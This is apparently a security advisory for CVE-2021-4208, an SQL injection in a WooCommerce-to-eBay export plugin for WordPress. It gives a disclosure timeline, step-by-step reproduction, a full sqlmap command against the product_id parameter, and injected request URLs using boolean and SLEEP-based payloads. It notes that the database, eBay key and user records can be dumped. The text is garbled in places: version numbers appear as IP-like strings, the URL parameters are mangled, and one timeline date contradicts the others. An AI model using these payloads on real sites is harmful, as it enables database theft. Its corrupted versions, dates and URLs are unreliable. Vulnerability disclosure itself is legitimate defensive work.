CVSS: 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)
Nov 21, 2021: Issue Identified and Disclosed to WP plugin team
Nov 22, 2021 : Got auto reply and Plugin Closed
December 27, 2021: Submitted to Mitre for cve
January 20, 2022: Got reply from Mitre saying to ping Wpscan, pinged Wpscan
January 21, 2021 : CVE Assigned CVE-2021-4208
February 21, 2022: CVE Published in NVD
February 28, 2022: CVE updated with score
The ExportFeed: List WooCommerce Products on eBay Store plugin 188.8.131.52 uses a `product_id` POST parameter which is not properly sanitized for use in an SQL statement, leading to a SQL injection vulnerability.
SQL injection vulnerability in fetch_product_ajax.php in Exportfeed List WooCommerce Products on eBay Store Wordpress plugin 1.1.0 through 184.108.40.206 allows authenticated attackers to execute arbitrary SQL commands via the product_id POST parameter.
We can see the problematic code in fetch_product_ajax.php
This vulnerability is present in the current version of the plugin 220.127.116.11 and appears to also be present back to version 1.1.0. Administrative access is required to access the vulnerable functionality.
Link to plugin:
Steps to reproduce:
- Log into WordPress as the admin user
- Install WooCommerce and 'ExportFeed: List WooCommerce Products on eBay Store' plugins
- Perform initial config for the WooCommerce plugin and create a product
- Perform initial config for the ExportFeed plugin and create an eBay Connect (Create Feed will not work without this)
- In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
- Modify the original request parameters so we hit the appropriate functionality
- Save the request to a file, post.txt
- Run sqlmap to pull the current user
sqlmap -r post.txt --dbms=mysql --current-user --keep-alive --level=3 --risk=3 -p product_id --threads=5 --flush-session
https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/Wp/fetch_product_ajax.phpaaction=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=fisku=snakefimerchat_type=eBaySeller&service_name=eBaySeller&showOutofStock=1&1imit=0,105q=savepalocal_cat_ids=18product_id=1 AND 3082:3082
https://test0.local/wp-admin/admin-ajax.php?action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.phpfiaction=ebcpf_ebayseller_handles&security=1c6e01b2a4&category=fisku=snakefimerchat_type=eBaySeller&service_name=eBaySellerashowOutofStock=lalimit=0,108q=savepfilocal_cat_ids=1&product_id=1 AND (SELECT 9979 FROM (SELECT(SLEEP(5)))Ing)
Using this technique, we can also (slowly) dump the entire contents of the database, including the key for the ebay connection this plugin uses, WordPress users, and so on.